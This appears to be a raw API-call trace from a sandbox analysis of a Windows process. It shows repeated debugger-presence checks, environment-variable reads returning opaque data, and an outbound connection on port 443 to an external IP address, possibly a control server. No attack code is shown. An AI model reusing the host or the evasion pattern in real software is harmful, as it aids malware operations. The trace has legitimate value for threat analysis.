	[0110.119] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77960000
	[0110.119] GetModuleFileNameW (in: hModule=0x77960000, lpFilename=0x20af264, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d
	[0110.119] IsDebuggerPresent () returned 0
	[0110.119] GetProcessWindowStation () returned 0x84
	[0110.119] GetUserObjectInformationW (in: hObj=0x84, nIndex=1, pvInfo=0x20aeda4, nLength=0xc, lpnLengthNeeded=0x20aed90 | out: pvInfo=0x20aeda4, lpnLengthNeeded=0x20aed90) returned 1
	[0110.120] GetActiveWindow () returned 0x0
	[0110.120] MessageBoxW (hWnd=0x0, lpText="Assertion failed!\n\nProgram: C:\\Windows\\SYSTEM32\\ntdll.dll\nFile: src\\win\\timer.c\nLine: 37\n\nExpression: new_time >= loop->time\n\nFor information on how your program can cause an assertion\nfailure, see the Visual C++ documentation on asserts\n\n(Press Retry to debug the application - JIT must be enabled)", lpCaption="Microsoft Visual C++ Runtime Library", uType=0x12012) returned 5
	[0110.385] WSARecv (in: s=0xa24, lpBuffers=0x20afbf8, dwBufferCount=0x1, lpNumberOfBytesRecvd=0x20afbf0, lpFlags=0x20afbf4*=0x0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpBuffers=0x20afbf8*=((len=0x1000, buf=0x26450b0*)), lpNumberOfBytesRecvd=0x20afbf0*=0x112, lpFlags=0x20afbf4*=0x0, lpOverlapped=0x0) returned 0
	[0110.385] SetLastError (dwErrCode=0x0) 
	[0110.385] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20afa6c | out: lpSystemTimeAsFileTime=0x20afa6c*(dwLowDateTime=0x7360fdae, dwHighDateTime=0x1d492ec)) 
	[0110.386] SetLastError (dwErrCode=0x0) 
	[0110.386] SetLastError (dwErrCode=0x0) 
	[0110.386] SetLastError (dwErrCode=0x0) 
	[0110.386] SetLastError (dwErrCode=0x0) 
	[0110.386] SetLastError (dwErrCode=0x0) 
	[0110.386] SetLastError (dwErrCode=0x0) 
	[0110.386] SetLastError (dwErrCode=0x0) 
	[0110.386] GetEnvironmentVariableW (in: lpName="debug_tls", lpBuffer=0x209f4fc, nSize=0x7fff | out: lpBuffer="\xdd09\x1760\xf520\x209\xdd09\x1760\x421a\x413\xf724\x20a\xf568\x209\xf568\x209\x4be0\x25b\xdd09\x1760\x2b04\x52\x2b0e\x413\x2b08\x52\xff54\x412\xf6c4\x20a\xf724\x20a\xf588\x209\x04") returned 0x0
	[0110.387] GetLastError () returned 0xcb
	[0110.387] SetLastError (dwErrCode=0x0) 
	[0110.387] SetLastError (dwErrCode=0x0) 
	[0110.387] SetLastError (dwErrCode=0x0) 
	[0110.387] WSASend (in: s=0xa24, lpBuffers=0x20afb10*=((len=0x14f, buf=0x51b4970*)), dwBufferCount=0x1, lpNumberOfBytesSent=0x20afa78, dwFlags=0x0, lpOverlapped=0x51cf978, lpCompletionRoutine=0x0 | out: lpBuffers=0x20afb10*=((len=0x14f, buf=0x51b4970*)), lpNumberOfBytesSent=0x20afa78*=0x14f, lpOverlapped=0x51cf978) returned 0
	[0110.388] WSARecv (in: s=0xa24, lpBuffers=0x20afbd0, dwBufferCount=0x1, lpNumberOfBytesRecvd=0x20afbcc, lpFlags=0x20afbc8*=0x0, lpOverlapped=0x51b36e4, lpCompletionRoutine=0x0 | out: lpBuffers=0x20afbd0*=((len=0x0, buf=0x44a7430)), lpNumberOfBytesRecvd=0x20afbcc*=0x0, lpFlags=0x20afbc8*=0x0, lpOverlapped=0x51b36e4) returned -1
	[0110.388] GetLastError () returned 0x3e5
	[0110.388] GetQueuedCompletionStatusEx (in: CompletionPort=0x398, lpCompletionPortEntries=0x20af408, ulCount=0x80, ulNumEntriesRemoved=0x20af3fc, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x20af408, ulNumEntriesRemoved=0x20af3fc) returned 0
	[0110.388] GetLastError () returned 0x102
	[0110.388] QueryPerformanceCounter (in: lpPerformanceCount=0x20afc38 | out: lpPerformanceCount=0x20afc38*=1819289500000) returned 1
	[0110.389] GetModuleHandleExW (in: dwFlags=0x6, lpModuleName=0x40215fd, phModule=0x20aedd8 | out: phModule=0x20aedd8*=0x77960000) returned 1
	[0110.389] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77960000
	[0110.389] GetModuleFileNameW (in: hModule=0x77960000, lpFilename=0x20af264, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d
	[0110.389] IsDebuggerPresent () returned 0
	[0110.389] GetProcessWindowStation () returned 0x84
	[0110.390] GetUserObjectInformationW (in: hObj=0x84, nIndex=1, pvInfo=0x20aeda4, nLength=0xc, lpnLengthNeeded=0x20aed90 | out: pvInfo=0x20aeda4, lpnLengthNeeded=0x20aed90) returned 1
	[0110.390] GetActiveWindow () returned 0x0
	[0110.390] MessageBoxW (hWnd=0x0, lpText="Assertion failed!\n\nProgram: C:\\Windows\\SYSTEM32\\ntdll.dll\nFile: src\\win\\timer.c\nLine: 37\n\nExpression: new_time >= loop->time\n\nFor information on how your program can cause an assertion\nfailure, see the Visual C++ documentation on asserts\n\n(Press Retry to debug the application - JIT must be enabled)", lpCaption="Microsoft Visual C++ Runtime Library", uType=0x12012) returned 5
	[0110.771] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f7a4, nSize=0x7fff | out: lpBuffer="\x4695\x413\xf984\x20a\xfbc\x413\xf854\x209\xf924\x20a\xf924\x20a") returned 0x0
	[0110.771] GetLastError () returned 0xcb
	[0110.771] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f7a4, nSize=0x7fff | out: lpBuffer="\x4695\x413\xf984\x20a\xfbc\x413\xf854\x209\xf924\x20a\xf924\x20a") returned 0x0
	[0110.772] GetLastError () returned 0xcb
	[0110.772] GetQueuedCompletionStatusEx (in: CompletionPort=0x398, lpCompletionPortEntries=0x20af408, ulCount=0x80, ulNumEntriesRemoved=0x20af3fc, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x20af408, ulNumEntriesRemoved=0x20af3fc) returned 1
	[0110.772] QueryPerformanceCounter (in: lpPerformanceCount=0x20af3f0 | out: lpPerformanceCount=0x20af3f0*=1819327900000) returned 1
	[0110.772] QueryPerformanceCounter (in: lpPerformanceCount=0x20afc38 | out: lpPerformanceCount=0x20afc38*=1819327900000) returned 1
	[0110.773] GetModuleHandleExW (in: dwFlags=0x6, lpModuleName=0x40215fd, phModule=0x20aedd8 | out: phModule=0x20aedd8*=0x77960000) returned 1
	[0110.773] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77960000
	[0110.773] GetModuleFileNameW (in: hModule=0x77960000, lpFilename=0x20af264, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d
	[0110.773] IsDebuggerPresent () returned 0
	[0110.773] GetProcessWindowStation () returned 0x84
	[0110.773] GetUserObjectInformationW (in: hObj=0x84, nIndex=1, pvInfo=0x20aeda4, nLength=0xc, lpnLengthNeeded=0x20aed90 | out: pvInfo=0x20aeda4, lpnLengthNeeded=0x20aed90) returned 1
	[0110.773] GetActiveWindow () returned 0x0
	[0110.773] MessageBoxW (hWnd=0x0, lpText="Assertion failed!\n\nProgram: C:\\Windows\\SYSTEM32\\ntdll.dll\nFile: src\\win\\timer.c\nLine: 37\n\nExpression: new_time >= loop->time\n\nFor information on how your program can cause an assertion\nfailure, see the Visual C++ documentation on asserts\n\n(Press Retry to debug the application - JIT must be enabled)", lpCaption="Microsoft Visual C++ Runtime Library", uType=0x12012) returned 5
	[0111.153] SCardEstablishContext (in: dwScope=0x0, pvReserved1=0x0, pvReserved2=0x0, phContext=0x44a6b04 | out: phContext=0x44a6b04) returned -2146435043
	[0111.469] WSARecv (in: s=0xa24, lpBuffers=0x20afbf8, dwBufferCount=0x1, lpNumberOfBytesRecvd=0x20afbf0, lpFlags=0x20afbf4*=0x0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpBuffers=0x20afbf8*=((len=0x1000, buf=0x26450b0*)), lpNumberOfBytesRecvd=0x20afbf0*=0x127, lpFlags=0x20afbf4*=0x0, lpOverlapped=0x0) returned 0
	[0111.469] SetLastError (dwErrCode=0x0) 
	[0111.469] SetLastError (dwErrCode=0x0) 
	[0111.469] SetLastError (dwErrCode=0x0) 
	[0111.470] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0111.470] GetLastError () returned 0xcb
	[0111.470] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0111.470] GetLastError () returned 0xcb
	[0111.472] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f354, nSize=0x7fff | out: lpBuffer="") returned 0x0
	[0111.472] GetLastError () returned 0xcb
	[0111.473] SetLastError (dwErrCode=0x0) 
	[0111.473] SetLastError (dwErrCode=0x0) 
	[0111.473] SetLastError (dwErrCode=0x0) 
	[0111.473] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0111.473] GetLastError () returned 0xcb
	[0111.473] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0111.474] GetLastError () returned 0xcb
	[0111.475] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f354, nSize=0x7fff | out: lpBuffer="") returned 0x0
	[0111.475] GetLastError () returned 0xcb
	[0111.476] GetEnvironmentVariableW (in: lpName="debug_main", lpBuffer=0x209f32c, nSize=0x7fff | out: lpBuffer="\x4bd0\x25b\xf360\x20a\x37d9\x3f8\xf4a4\x20a\x66c0\x26d\x09") returned 0x0
	[0111.476] GetLastError () returned 0xcb
	[0111.476] GetEnvironmentVariableW (in: lpName="debug_main", lpBuffer=0x209f32c, nSize=0x7fff | out: lpBuffer="\x4bd0\x25b\xf360\x20a\x37d9\x3f8\xf4a4\x20a\x66c0\x26d\x09") returned 0x0
	[0111.476] GetLastError () returned 0xcb
	[0111.476] GetEnvironmentVariableW (in: lpName="debug_main", lpBuffer=0x209f304, nSize=0x7fff | out: lpBuffer="\x4bd0\x25b\xf338\x20a\x37d9\x3f8\xf38c\x20a\x66c0\x26d\x0a") returned 0x0
	[0111.476] GetLastError () returned 0xcb
	[0111.477] GetEnvironmentVariableW (in: lpName="debug_main", lpBuffer=0x209f2c4, nSize=0x7fff | out: lpBuffer="\x345d\x411\x4bd0\x25b\x2b30\x52\x3ac8\x52\x38ca\x3f8\xf378\x20a\x4bd0\x25b\xf310\x20a\x37d9\x3f8\xf364\x20a\x66c0\x26d\x0a") returned 0x0
	[0111.477] GetLastError () returned 0xcb
	[0111.478] GetEnvironmentVariableW (in: lpName="debug_tls", lpBuffer=0x209f214, nSize=0x7fff | out: lpBuffer="") returned 0x0
	[0111.478] GetLastError () returned 0xcb
	[0111.480] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f16c, nSize=0x7fff | out: lpBuffer="ը瞙") returned 0x0
	[0111.480] GetLastError () returned 0xcb
	[0111.480] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f16c, nSize=0x7fff | out: lpBuffer="ը瞙") returned 0x0
	[0111.480] GetLastError () returned 0xcb
	[0111.480] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f1bc, nSize=0x7fff | out: lpBuffer="\x4bd0\x25b\x3f61\x411\x2b30\x52\x2b38\x52") returned 0x0
	[0111.480] GetLastError () returned 0xcb
	[0111.481] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f1c4, nSize=0x7fff | out: lpBuffer="⬰R⬸R") returned 0x0
	[0111.481] GetLastError () returned 0xcb
	[0111.481] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f1c4, nSize=0x7fff | out: lpBuffer="⬰R⬸R") returned 0x0
	[0111.481] GetLastError () returned 0xcb
	[0111.481] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f2cc, nSize=0x7fff | out: lpBuffer="\x2b30\x52\x3ac8\x52\x38ca\x3f8\xf378\x20a\x4bd0\x25b\xf310\x20a\x37d9\x3f8\xf364\x20a\x66c0\x26d\x0a") returned 0x0
	[0111.482] GetLastError () returned 0xcb
	[0111.482] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f28c, nSize=0x7fff | out: lpBuffer="\x345d\x411\x4bd0\x25b\x2b30\x52\x3ac8\x52\x38ca\x3f8\xf340\x20a\x4bd0\x25b\xf2d8\x20a\x37d9\x3f8\x0a") returned 0x0
	[0111.482] GetLastError () returned 0xcb
	[0111.482] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f28c, nSize=0x7fff | out: lpBuffer="\x345d\x411\x4bd0\x25b\x2b30\x52\x3ac8\x52\x38ca\x3f8\xf340\x20a\x4bd0\x25b\xf2d8\x20a\x37d9\x3f8\x0a") returned 0x0
	[0111.482] GetLastError () returned 0xcb
	[0111.482] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f28c, nSize=0x7fff | out: lpBuffer="\x345d\x411\x4bd0\x25b\x2b30\x52\x3ac8\x52\x38ca\x3f8\xf340\x20a\x4bd0\x25b\xf2d8\x20a\x37d9\x3f8\x0a") returned 0x0
	[0111.482] GetLastError () returned 0xcb
	[0111.483] closesocket (s=0xa24) returned 0
	[0111.486] SetLastError (dwErrCode=0x0) 
	[0111.486] SetLastError (dwErrCode=0x0) 
	[0111.486] GetQueuedCompletionStatusEx (in: CompletionPort=0x398, lpCompletionPortEntries=0x20af408, ulCount=0x80, ulNumEntriesRemoved=0x20af3fc, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x20af408, ulNumEntriesRemoved=0x20af3fc) returned 0
	[0111.486] GetLastError () returned 0x102
	[0111.487] timeGetTime () returned 0x2f5b2
	[0111.487] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20af920 | out: lpSystemTimeAsFileTime=0x20af920*(dwLowDateTime=0x740901ac, dwHighDateTime=0x1d492ec)) 
	[0111.487] htons (hostshort=0x1bb) returned 0xbb01
	[0111.487] socket (af=2, type=1, protocol=0) returned 0xa24
	[0111.487] ioctlsocket (in: s=0xa24, cmd=-2147195266, argp=0x20af738 | out: argp=0x20af738) returned 0
	[0111.487] SetHandleInformation (hObject=0xa24, dwMask=0x1, dwFlags=0x0) returned 1
	[0111.487] CreateIoCompletionPort (FileHandle=0xa24, ExistingCompletionPort=0x398, CompletionKey=0xa24, NumberOfConcurrentThreads=0x0) returned 0x398
	[0111.488] SetFileCompletionNotificationModes (FileHandle=0xa24, Flags=0x3) returned 1
	[0111.488] bind (s=0xa24, addr=0x44ab1c0*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0
	[0111.488] WSAIoctl (in: s=0xa24, dwIoControlCode=0xc8000006, lpvInBuffer=0x20af758, cbInBuffer=0x10, lpvOutBuffer=0x51b3380, cbOutBuffer=0x4, lpcbBytesReturned=0x20af754, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x51b3380, lpcbBytesReturned=0x20af754, lpOverlapped=0x0) returned 0
	[0111.488] ConnectEx (in: s=0xa24, name=0x20af780*(sa_family=2, sin_port=0x1bb, sin_addr="109.230.199.30"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x20af77c, lpOverlapped=0x51bad70 | out: lpSendBuffer=0x0, lpdwBytesSent=0x20af77c*=0x259d200) returned 0
	[0111.488] GetLastError () returned 0x3e5
	[0111.488] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f8bc, nSize=0x7fff | out: lpBuffer="\x4bd0\x25b\xf8f0\x20a\x37d9\x3f8\xf968\x20a\x5220\x26d\x0a") returned 0x0
	[0111.488] GetLastError () returned 0xcb
	[0111.489] GetQueuedCompletionStatusEx (in: CompletionPort=0x398, lpCompletionPortEntries=0x20af408, ulCount=0x80, ulNumEntriesRemoved=0x20af3fc, dwMilliseconds=0x3d4, fAlertable=0 | out: lpCompletionPortEntries=0x20af408, ulNumEntriesRemoved=0x20af3fc) returned 1
	[0111.532] QueryPerformanceCounter (in: lpPerformanceCount=0x20af3f0 | out: lpPerformanceCount=0x20af3f0*=1819404000000) returned 1
	[0111.538] QueryPerformanceCounter (in: lpPerformanceCount=0x20afc38 | out: lpPerformanceCount=0x20afc38*=1819404500000) returned 1
	[0111.543] GetModuleHandleExW (in: dwFlags=0x6, lpModuleName=0x40215fd, phModule=0x20aedd8 | out: phModule=0x20aedd8*=0x77960000) returned 1
	[0111.545] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77960000
	[0111.546] GetModuleFileNameW (in: hModule=0x77960000, lpFilename=0x20af264, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d
	[0111.546] IsDebuggerPresent () returned 0
	[0111.561] GetProcessWindowStation () returned 0x84
	[0111.561] GetUserObjectInformationW (in: hObj=0x84, nIndex=1, pvInfo=0x20aeda4, nLength=0xc, lpnLengthNeeded=0x20aed90 | out: pvInfo=0x20aeda4, lpnLengthNeeded=0x20aed90) returned 1
	[0111.561] GetActiveWindow () returned 0x0
	[0111.561] MessageBoxW (hWnd=0x0, lpText="Assertion failed!\n\nProgram: C:\\Windows\\SYSTEM32\\ntdll.dll\nFile: src\\win\\timer.c\nLine: 37\n\nExpression: new_time >= loop->time\n\nFor information on how your program can cause an assertion\nfailure, see the Visual C++ documentation on asserts\n\n(Press Retry to debug the application - JIT must be enabled)", lpCaption="Microsoft Visual C++ Runtime Library", uType=0x12012) returned 5
	[0111.812] setsockopt (s=0xa24, level=65535, optname=28688, optval=0x0, optlen=0) returned 0
	[0111.812] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f894, nSize=0x7fff | out: lpBuffer="\x4bd0\x25b\xf8c8\x20a\x37d9\x3f8\x4bf8\x25b\x6e40\x26d\x09") returned 0x0
	[0111.812] GetLastError () returned 0xcb
	[0111.812] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f634, nSize=0x7fff | out: lpBuffer="\x0c") returned 0x0
	[0111.812] GetLastError () returned 0xcb
	[0111.813] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f634, nSize=0x7fff | out: lpBuffer="\x0c") returned 0x0
	[0111.813] GetLastError () returned 0xcb
	[0111.813] WSARecv (in: s=0xa24, lpBuffers=0x20af644, dwBufferCount=0x1, lpNumberOfBytesRecvd=0x20af640, lpFlags=0x20af63c*=0x0, lpOverlapped=0x51b3344, lpCompletionRoutine=0x0 | out: lpBuffers=0x20af644*=((len=0x0, buf=0x44a7430)), lpNumberOfBytesRecvd=0x20af640*=0x20af698, lpFlags=0x20af63c*=0x0, lpOverlapped=0x51b3344) returned -1
	[0111.813] GetLastError () returned 0x3e5
	[0111.813] SetLastError (dwErrCode=0x0) 
	[0111.813] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20af32c | out: lpSystemTimeAsFileTime=0x20af32c*(dwLowDateTime=0x743ad12a, dwHighDateTime=0x1d492ec)) 
	[0111.814] SetLastError (dwErrCode=0x0) 
	[0111.814] WSASend (in: s=0xa24, lpBuffers=0x20af7a8*=((len=0x12e, buf=0x51b65a8*)), dwBufferCount=0x1, lpNumberOfBytesSent=0x20af710, dwFlags=0x0, lpOverlapped=0x51cfa90, lpCompletionRoutine=0x0 | out: lpBuffers=0x20af7a8*=((len=0x12e, buf=0x51b65a8*)), lpNumberOfBytesSent=0x20af710*=0x12e, lpOverlapped=0x51cfa90) returned 0
	[0111.815] GetQueuedCompletionStatusEx (in: CompletionPort=0x398, lpCompletionPortEntries=0x20af408, ulCount=0x80, ulNumEntriesRemoved=0x20af3fc, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x20af408, ulNumEntriesRemoved=0x20af3fc) returned 0
	[0111.815] GetLastError () returned 0x102
	[0111.815] QueryPerformanceCounter (in: lpPerformanceCount=0x20afc38 | out: lpPerformanceCount=0x20afc38*=1819432200000) returned 1
	[0111.815] GetModuleHandleExW (in: dwFlags=0x6, lpModuleName=0x40215fd, phModule=0x20aedd8 | out: phModule=0x20aedd8*=0x77960000) returned 1
	[0111.816] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77960000
	[0111.816] GetModuleFileNameW (in: hModule=0x77960000, lpFilename=0x20af264, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d
	[0111.816] IsDebuggerPresent () returned 0
	[0111.816] GetProcessWindowStation () returned 0x84
	[0111.816] GetUserObjectInformationW (in: hObj=0x84, nIndex=1, pvInfo=0x20aeda4, nLength=0xc, lpnLengthNeeded=0x20aed90 | out: pvInfo=0x20aeda4, lpnLengthNeeded=0x20aed90) returned 1
	[0111.816] GetActiveWindow () returned 0x0
	[0111.816] MessageBoxW (hWnd=0x0, lpText="Assertion failed!\n\nProgram: C:\\Windows\\SYSTEM32\\ntdll.dll\nFile: src\\win\\timer.c\nLine: 37\n\nExpression: new_time >= loop->time\n\nFor information on how your program can cause an assertion\nfailure, see the Visual C++ documentation on asserts\n\n(Press Retry to debug the application - JIT must be enabled)", lpCaption="Microsoft Visual C++ Runtime Library", uType=0x12012) returned 5
	[0112.007] GetQueuedCompletionStatusEx (in: CompletionPort=0x398, lpCompletionPortEntries=0x20af408, ulCount=0x80, ulNumEntriesRemoved=0x20af3fc, dwMilliseconds=0x28d, fAlertable=0 | out: lpCompletionPortEntries=0x20af408, ulNumEntriesRemoved=0x20af3fc) returned 1
	[0112.007] QueryPerformanceCounter (in: lpPerformanceCount=0x20af3f0 | out: lpPerformanceCount=0x20af3f0*=1819451400000) returned 1
	[0112.007] QueryPerformanceCounter (in: lpPerformanceCount=0x20afc38 | out: lpPerformanceCount=0x20afc38*=1819451400000) returned 1
	[0112.008] GetModuleHandleExW (in: dwFlags=0x6, lpModuleName=0x40215fd, phModule=0x20aedd8 | out: phModule=0x20aedd8*=0x77960000) returned 1
	[0112.008] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77960000
	[0112.008] GetModuleFileNameW (in: hModule=0x77960000, lpFilename=0x20af264, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d
	[0112.008] IsDebuggerPresent () returned 0
	[0112.008] GetProcessWindowStation () returned 0x84
	[0112.008] GetUserObjectInformationW (in: hObj=0x84, nIndex=1, pvInfo=0x20aeda4, nLength=0xc, lpnLengthNeeded=0x20aed90 | out: pvInfo=0x20aeda4, lpnLengthNeeded=0x20aed90) returned 1
	[0112.008] GetActiveWindow () returned 0x0
	[0112.008] MessageBoxW (hWnd=0x0, lpText="Assertion failed!\n\nProgram: C:\\Windows\\SYSTEM32\\ntdll.dll\nFile: src\\win\\timer.c\nLine: 37\n\nExpression: new_time >= loop->time\n\nFor information on how your program can cause an assertion\nfailure, see the Visual C++ documentation on asserts\n\n(Press Retry to debug the application - JIT must be enabled)", lpCaption="Microsoft Visual C++ Runtime Library", uType=0x12012) returned 5
	[0112.218] WSARecv (in: s=0xa24, lpBuffers=0x20afbf8, dwBufferCount=0x1, lpNumberOfBytesRecvd=0x20afbf0, lpFlags=0x20afbf4*=0x0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpBuffers=0x20afbf8*=((len=0x1000, buf=0x26430a0*)), lpNumberOfBytesRecvd=0x20afbf0*=0x36f, lpFlags=0x20afbf4*=0x0, lpOverlapped=0x0) returned 0
	[0112.218] SetLastError (dwErrCode=0x0) 
	[0112.218] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20af66c | out: lpSystemTimeAsFileTime=0x20af66c*(dwLowDateTime=0x74788c48, dwHighDateTime=0x1d492ec)) 
	[0112.218] SetLastError (dwErrCode=0x0) 
	[0112.218] SetLastError (dwErrCode=0x0) 
	[0112.218] SetLastError (dwErrCode=0x0) 
	[0112.218] SetLastError (dwErrCode=0x0) 
	[0112.218] SetLastError (dwErrCode=0x0) 
	[0112.219] SetLastError (dwErrCode=0x0) 
	[0112.219] GetLastError () returned 0x0
	[0112.219] SetLastError (dwErrCode=0x0) 
	[0112.219] SetLastError (dwErrCode=0x0) 
	[0112.219] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20af434 | out: lpSystemTimeAsFileTime=0x20af434*(dwLowDateTime=0x7478c57e, dwHighDateTime=0x1d492ec)) 
	[0112.219] GetLastError () returned 0x0
	[0112.219] SetLastError (dwErrCode=0x0) 
	[0112.219] SetLastError (dwErrCode=0x0) 
	[0112.219] SetLastError (dwErrCode=0x0) 
	[0112.220] SetLastError (dwErrCode=0x0) 
	[0112.220] SetLastError (dwErrCode=0x0) 
	[0112.224] SetLastError (dwErrCode=0x0) 
	[0112.224] SetLastError (dwErrCode=0x0) 
	[0112.225] SetLastError (dwErrCode=0x0) 
	[0112.225] SetLastError (dwErrCode=0x0) 
	[0112.225] SetLastError (dwErrCode=0x0) 
	[0112.225] WSASend (in: s=0xa24, lpBuffers=0x20afb10*=((len=0xbf, buf=0x51b65a8*)), dwBufferCount=0x1, lpNumberOfBytesSent=0x20afa78, dwFlags=0x0, lpOverlapped=0x51cfa90, lpCompletionRoutine=0x0 | out: lpBuffers=0x20afb10*=((len=0xbf, buf=0x51b65a8*)), lpNumberOfBytesSent=0x20afa78*=0xbf, lpOverlapped=0x51cfa90) returned 0
	[0112.225] WSARecv (in: s=0xa24, lpBuffers=0x20afbd0, dwBufferCount=0x1, lpNumberOfBytesRecvd=0x20afbcc, lpFlags=0x20afbc8*=0x0, lpOverlapped=0x51b3344, lpCompletionRoutine=0x0 | out: lpBuffers=0x20afbd0*=((len=0x0, buf=0x44a7430)), lpNumberOfBytesRecvd=0x20afbcc*=0x0, lpFlags=0x20afbc8*=0x0, lpOverlapped=0x51b3344) returned -1
	[0112.225] GetLastError () returned 0x3e5
	[0112.226] GetQueuedCompletionStatusEx (in: CompletionPort=0x398, lpCompletionPortEntries=0x20af408, ulCount=0x80, ulNumEntriesRemoved=0x20af3fc, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x20af408, ulNumEntriesRemoved=0x20af3fc) returned 0
	[0112.226] GetLastError () returned 0x102
	[0112.226] QueryPerformanceCounter (in: lpPerformanceCount=0x20afc38 | out: lpPerformanceCount=0x20afc38*=1819473200000) returned 1
	[0112.226] GetModuleHandleExW (in: dwFlags=0x6, lpModuleName=0x40215fd, phModule=0x20aedd8 | out: phModule=0x20aedd8*=0x77960000) returned 1
	[0112.227] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77960000
	[0112.227] GetModuleFileNameW (in: hModule=0x77960000, lpFilename=0x20af264, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d
	[0112.227] IsDebuggerPresent () returned 0
	[0112.227] GetProcessWindowStation () returned 0x84
	[0112.227] GetUserObjectInformationW (in: hObj=0x84, nIndex=1, pvInfo=0x20aeda4, nLength=0xc, lpnLengthNeeded=0x20aed90 | out: pvInfo=0x20aeda4, lpnLengthNeeded=0x20aed90) returned 1
	[0112.227] GetActiveWindow () returned 0x0
	[0112.227] MessageBoxW (hWnd=0x0, lpText="Assertion failed!\n\nProgram: C:\\Windows\\SYSTEM32\\ntdll.dll\nFile: src\\win\\timer.c\nLine: 37\n\nExpression: new_time >= loop->time\n\nFor information on how your program can cause an assertion\nfailure, see the Visual C++ documentation on asserts\n\n(Press Retry to debug the application - JIT must be enabled)", lpCaption="Microsoft Visual C++ Runtime Library", uType=0x12012) returned 5
	[0112.513] GetQueuedCompletionStatusEx (in: CompletionPort=0x398, lpCompletionPortEntries=0x20af408, ulCount=0x80, ulNumEntriesRemoved=0x20af3fc, dwMilliseconds=0xf2, fAlertable=0 | out: lpCompletionPortEntries=0x20af408, ulNumEntriesRemoved=0x20af3fc) returned 1
	[0112.513] QueryPerformanceCounter (in: lpPerformanceCount=0x20af3f0 | out: lpPerformanceCount=0x20af3f0*=1819501900000) returned 1
	[0112.513] QueryPerformanceCounter (in: lpPerformanceCount=0x20afc38 | out: lpPerformanceCount=0x20afc38*=1819501900000) returned 1
	[0112.513] GetModuleHandleExW (in: dwFlags=0x6, lpModuleName=0x40215fd, phModule=0x20aedd8 | out: phModule=0x20aedd8*=0x77960000) returned 1
	[0112.514] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77960000
	[0112.514] GetModuleFileNameW (in: hModule=0x77960000, lpFilename=0x20af264, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d
	[0112.514] IsDebuggerPresent () returned 0
